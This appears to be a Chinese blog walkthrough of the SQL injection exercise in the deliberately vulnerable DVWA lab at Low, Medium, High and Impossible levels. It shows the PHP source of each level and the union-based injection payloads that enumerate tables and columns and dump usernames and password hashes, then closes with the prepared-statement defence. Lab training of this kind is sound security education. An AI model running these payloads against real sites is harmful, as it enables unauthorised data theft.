sql注入是典型、常见的Web漏洞之一,现在在网络中也可能存在,不过大多数为SQL盲注

攻击者通过恶意的SQL语句来破坏SQL查询语句,达到数据库泄露的目的

LOW

审计源码

<?php

// 判断是否提交

if( isset( $_REQUEST[ 'Submit' ] ) ) {

    // 获取传入的 id

    $id = $_REQUEST[ 'id' ];

    // switch case 语句,类似于if elif else语句

    // 判断数据库类型

    switch ($_DVWA['SQLI_DB']) {

        // mysql数据库

        case MYSQL:

            // 定义sql语句,在 $id 左右加入了 '' ,代表这是一个字符串类型的注入

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

            // 进行数据库查询

            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // 从结果集中取得一行作为关联数组

            while( $row = mysqli_fetch_assoc( $result ) ) {

                // 获取 first_name 和 last_name 字段内容

                $first = $row["first_name"];

                $last  = $row["last_name"];

                // 打印用户信息

                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

            }

            mysqli_close($GLOBALS["___mysqli_ston"]);

            break;

        // sqlite数据库

        case SQLITE:

            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);

            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

            #print $query;

            try {

                $results = $sqlite_db_connection->query($query);

            } catch (Exception $e) {

                echo 'Caught exception: ' . $e->getMessage();

                exit();

            }

            if ($results) {

                while ($row = $results->fetchArray()) {

                    // Get values

                    $first = $row["first_name"];

                    $last  = $row["last_name"];

                    // Feedback for end user

                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

                }

            } else {

                echo "Error in fetch ".$sqlite_db->lastErrorMsg();

            }

            break;

    }

}

?>

通过观察,只是判断了服务器的数据库,没有对我们传入的ID进行一些过滤,可以直接进行SQL注入

union 联合查询注入

判断注入类型

使用1或者1a来进行判断,如果是数字类型,1a就会报错

http://172.19.31.9/dvwa/vulnerabilities/sqli/?id=1a&Submit=Submit#



1a正常执行,可以看出是字符型的,需要我们输入'进行闭合

构造闭合id=1'#



正常回显

order by 判断字段数

1' order by 1#



正常执行

在输入1' order by 3#时,进行了报错



那么就是有两个字段数

union select 1,2查看回显字段

1' union select 1,2 #



这里成功回显了我们select 1,2的值,也显示了上一个注释的语句的输出,可以输入

-1' union select 1,2 #,-1让前面的语句报错,只显示了后面的查询内容

database()获取当前数据库

-1' union select user(),version()#



回显了当前数据库的用户、数据库版本号

再次使用database()、@@datadir,获取数据库目录和当前数据库名

-1' union select @@datadir,database()#



得到当前数据库名为dvwa

获取dvwa数据库中的表

-1' union select table_name,2 from information_schema.tables where table_schema=database()#



发现报错,这里是字段列的编码格式不一样,只需要把table_namehex()函数包裹起来,因为mysql是认识十六进制的

-1' union select hex(table_name),2 from information_schema.tables where table_schema=database()#



First name列中,显示了两次的数据,代表有两个数据库,将其中的十六进制解码得到

使用HackBar解码后得到6775657374626F6F6B的值为guestbook,另一个是users



有时候其他的靶场只能回显一段数据,不像现在一样回显两段数据,可以使用group_concat,将每行的数据使用,隔开进行显示

-1' union select group_concat(hex(table_name)),2 from information_schema.tables where table_schema=database()#



这样就显示了一段数据

获取users表中的字段名

-1' union select column_name,2 from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查询数据库中字段的名称,where用筛选到dvwa数据库中的users表,database()执行转换为dvwa,mysql可以读取十六进制,0x7573657273users

查询报错



跟上次一样,继续使用hex()进行转换,这里我也加上了group_concat函数

-1' union select group_concat(hex(column_name)),2 from information_schema.columns where table_schema=database() and table_name=0x7573657273#



可以看到这里显示了很多字段名,一个一个爆破的到重要的字段名usernamepassword

查询 username,password字段的内容

-1' union select user,password from users#



成功获取数据库的密码,当然这里也可以使用hex()函数和group_concat()函数

这样就通过了

Medium

审计源码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {

    // 获取传入的 id

    $id = $_POST[ 'id' ];

    // mysqli_real_escape_string对 \n ' " 等字符进行的转义

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    // 判断数据库类型

    switch ($_DVWA['SQLI_DB']) {

        // mysql数据库

        case MYSQL:

            // id 没有价格引号,是一个数字型的sql注入

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // 获取查询中 first_name 和 last_name 字段的内容

            while( $row = mysqli_fetch_assoc( $result ) ) {

                // Display values

                $first = $row["first_name"];

                $last  = $row["last_name"];

                // Feedback for end user

                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

            }

            break;

        case SQLITE:

            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

            #print $query;

            try {

                $results = $sqlite_db_connection->query($query);

            } catch (Exception $e) {

                echo 'Caught exception: ' . $e->getMessage();

                exit();

            }

            if ($results) {

                while ($row = $results->fetchArray()) {

                    // Get values

                    $first = $row["first_name"];

                    $last  = $row["last_name"];

                    // Feedback for end user

                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

                }

            } else {

                echo "Error in fetch ".$sqlite_db->lastErrorMsg();

            }

            break;

    }

}

// This is used later on in the index.php page

// Setting it here so we can close the database connection in here like in the rest of the source scripts

$query  = "SELECT COUNT(*) FROM users;";

$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);

id变为了POST传参的方式,使用了mysqli_real_escape_string()函数对id进行了转义,并且做了一个选择,想通过这个来限制用户的输入



使用HackBar传参id=1a报错



可以判断这是一个数字行的注入

数字型的sql注入不用进行闭合

order by查看字段数量



和上一关一样,order by 3 报错,所有有 2 个字段

后续操作和LOW级别一致,只是不用使用'或者"进行闭合还有使用#注释

High

审计源码

<?php

if( isset( $_SESSION [ 'id' ] ) ) {

    // Get input

    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {

        case MYSQL:

            // Check database

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results

            while( $row = mysqli_fetch_assoc( $result ) ) {

                // Get values

                $first = $row["first_name"];

                $last  = $row["last_name"];

                // Feedback for end user

                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

            break;

        case SQLITE:

            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

            #print $query;

            try {

                $results = $sqlite_db_connection->query($query);

            } catch (Exception $e) {

                echo 'Caught exception: ' . $e->getMessage();

                exit();

            }

            if ($results) {

                while ($row = $results->fetchArray()) {

                    // Get values

                    $first = $row["first_name"];

                    $last  = $row["last_name"];

                    // Feedback for end user

                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

                }

            } else {

                echo "Error in fetch ".$sqlite_db->lastErrorMsg();

            }

            break;

    }

}

?>

这里的代码和LOW可以说是没有太大的区别了,只不过是通过session获取的ID值

一样的绕过方法1'#

Impossible

审计源码



<?php

if( isset( $_GET[ 'Submit' ] ) ) {

    // 获取user_token

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // 获取 id 值

    $id = $_GET[ 'id' ];

    // 判断 id 传入的是否为数字

    if(is_numeric( $id )) {

        // 将 id 转换为字符串

        $id = intval ($id);

        // 判断数据库类型

        switch ($_DVWA['SQLI_DB']) {

            case MYSQL:

                // 引入了PDO抽象成技术

                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );

                $data->bindParam( ':id', $id, PDO::PARAM_INT );

                $data->execute();

                $row = $data->fetch();

                // 获取 first_name 和 last_name 字段

                if( $data->rowCount() == 1 ) {

                    // Get values

                    $first = $row[ 'first_name' ];

                    $last  = $row[ 'last_name' ];

                    // 打印字段内容

                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

                }

                break;

            // SQLITE数据库

            case SQLITE:

                global $sqlite_db_connection;

                // 一样的方法

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );

                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);

                $result = $stmt->execute();

                $result->finalize();

                if ($result !== false) {

                    // There is no way to get the number of rows returned

                    // This checks the number of columns (not rows) just

                    // as a precaution, but it won't stop someone dumping

                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();

                    if ($num_columns == 2) {

                        $row = $result->fetchArray();

                        // 获取 first_name 和 last_name 字段的内容

                        $first = $row[ 'first_name' ];

                        $last  = $row[ 'last_name' ];

                        // 打印字段内容

                        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

                    }

                }

                break;

        }

    }

}

// 生成user_token

generateSessionToken();

?>

这里首先会判断传入的ID是否为数字,然后又将ID转换为了字符串类型,使用PDO方法连接数据库,然我们没机可乘

DVWA-SQL Injection(SQL注入)的更多相关文章

  1. Fortify Audit Workbench 笔记 SQL Injection SQL注入

    SQL Injection SQL注入 Abstract 通过不可信来源的输入构建动态 SQL 指令,攻击者就能够修改指令的含义或者执行任意 SQL 命令. Explanation SQL injec ...

  2. DVWA全级别之SQL Injection(SQL注入)

    DVWA全级别之SQL Injection(注入)   DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web ...

  3. DVWA之SQL Injection

    SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常 ...

  4. DVWA系列2:SQL Injection

    DVWA系列2:SQL Injection 前言 SQL 注入是比较常见的攻击类型,之前一直听说过,也尝试看过一些教程,但其中的单引号,字符串拼接等感觉有点抽象,不知道为什么要这么做.这次就使用 DV ...

  5. 新手指南:DVWA-1.9全级别教程之SQL Injection

    *本文原创作者:lonehand,转载须注明来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针 ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. 使用sqlmap注入DVWA的SQL Injection菜单

    1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用a ...

  8. 【DVWA】SQL Injection(SQL 注入)通关教程

    日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00.基本信息 关于 mysql 相关的注入,传送门. SQL 注入漏洞之 mysql - Bay0net - ...

  9. DVWA(三):SQL injection 全等级SQL注入

    (本文不定期更新) 一.所需环境: 1.DVWA 2.web环境 phpstudy/wamp 3.burp suite 二.SQL注入产生的原因: 程序员在编写代码的时候,没有对用户输入数据的合法性进 ...

  10. DVWA SQL Injection 通关教程

    SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...

随机推荐

  1. QFramework UI 笔记(后续不断 直到UKitI篇结束)

    1.所有的UIElement  传消息给 UIPanel 时,必须先注册 SendEvent();      RegisterEvent(); 2.注意Unity直接生成控件的名称,命名带(1)之类的 ...

  2. 上传镜像到harbor

    https://blog.csdn.net/weixin_45335305/article/details/123817541

  3. git rebase之abort,continue,skip

    git rebase --abort 会放弃合并,回到rebase操作之前的状态,之前的提交的不会丢 git rebase --skip 会将引起冲突的commit丢弃掉 git rebase --c ...

  4. HCIP-ICT实战进阶02-OSPF特殊区域及其他特性

    HCIP-ICT实战进阶02-OSPF特殊区域及其他特性 1 ospf区域 如果ospf只有单个区域, 会有什么问题? 如果只有当个区域, 该区域设备数量如果比较多, 对应一类LSA数量可能较少, 但 ...

  5. MVC+EF API 跨域

    MVC+EF API --2 一. MVC+EF 不管是MvcHAIS Ef 都有文件夹Controller 二.Link查询 多表联查 匿名类型 三.Postman使用 四.mvc访问使用API 跨 ...

  6. Day10-数组

    数组 一.什么是数组 数组是相同数据类型的有序集合 数字描述的是相同类型的若干个数据,按照一定的先后次序排列组合而成 其中.每一个数据称作一个数组元素,每个数组元素可以通过一个下表来访问它们 二.数组 ...

  7. FastReport和RDLC报表

    最近在做报表的时候第一次接触到RDLC报表,对比于之前使用的FastReport报表来说,在使用体验上个人目前感觉RDLC灵活性相对较差,尤其是表格的格式多样的时候,不易修改.RDLC应用于格式简单的 ...

  8. 1,权限问题:无法创建目录"**": 权限不够":

    1,权限问题:无法创建目录"**": 权限不够": 解决:在命令前加上 sudo 命令后,输入密码即可 原创建目录命令:mkdir [选项] DirName 解决权限问题 ...

  9. 容器内Java微服务报错:unable to create new native thread

    unable to create new native threadhttps://stackoverflow.com/questions/16789288/java-lang-outofmemory ...

  10. 字典方法 setdefault()、pprint;迭代、递归的区别

    计算一个字符串中每个字符出现的次数 import pprint message = 'It was a bright cold day in April, ' \ 'and the clocks we ...